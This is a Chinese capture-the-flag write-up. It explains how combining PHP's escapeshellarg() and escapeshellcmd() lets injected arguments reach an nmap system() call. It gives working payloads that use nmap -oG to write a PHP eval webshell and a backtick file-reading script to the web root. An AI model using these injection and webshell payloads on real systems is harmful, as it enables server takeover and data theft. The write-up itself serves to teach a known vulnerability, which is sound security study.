考点:代码审计、木马上传、nmap写文件
1.代码审计:
看到echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
这有个system来执行命令且有传参,这里就是利用点:
这里代码的本意是希望我们输入ip这样的参数做一个扫描,通过上面的两个函数来进行规则过滤转译,我们的输入会被单引号引起来,但是因为我们这两个函数一起用有漏洞,所以我们可以逃脱这个引号的束缚。
漏洞函数:
escapeshellarg()和escapeshellcmd()这两个函数在一起用会出现两次转译后出现了问题,没有考虑到单引号的问题
1)传入的参数是:172.17.0.2' -v -d a=1
2)经过escapeshellarg处理后变成了'172.17.0.2'\'' -v -d a=1',即先对单引号转义,再用单引号将左右两部分括起来从而起到连接的作用。
3)经过escapeshellcmd处理后变成'172.17.0.2'\\'' -v -d a=1\',这是因为escapeshellcmd对\以及最后那个不配对儿的引号进行了转义:http://php.net/manual/zh/function.escapeshellcmd.php
4)最后执行的命令是curl '172.17.0.2'\\'' -v -d a=1\',由于中间的\\被解释为\而不再是转义字符,所以后面的'没有被转义,与再后面的'配对儿成了一个空白连接符。所以可以简化为curl 172.17.0.2\ -v -d a=1',即向172.17.0.2\发起请求,POST 数据为a=1'
5)所以经过构造之后,输入的值被分割成为了三部分,第一部分就是curl的IP,为172.17.0.2\,第二部分就是两个配对的单引号 ' ' ,第三部分就是命令参数以及对象 -v -d a=1'
2.这里常见的命令后注入操作如| & &&都不行,虽然我们通过上面的操作逃过了单引号,但escapeshellcmd会对这些特殊符号前面加上\来转义,这时候就只有想想能不能利用nmap来做些什么了。
3.这时候百度可以发现在nmap命令中有一个参数-oG可以实现将命令和结果写到文件,这个命令就是我们的输入可控!然后写入到文件!很自然的想到了上传一个一句话木马。
4.在命令行中执行:?host=' <?php @eval($_POST["1"]);?> -oG 1.php ',执行后会返回文件夹名(前后都要加引号,1.php后面要有空格,)
5.用菜刀连接,根目录下找到flag
方法二:
4.在命令行中执行:?host=' <?php echo `cat /flag`;?> -oG test.php ',因为单引号被过滤了,我们使用反引号cat /flag
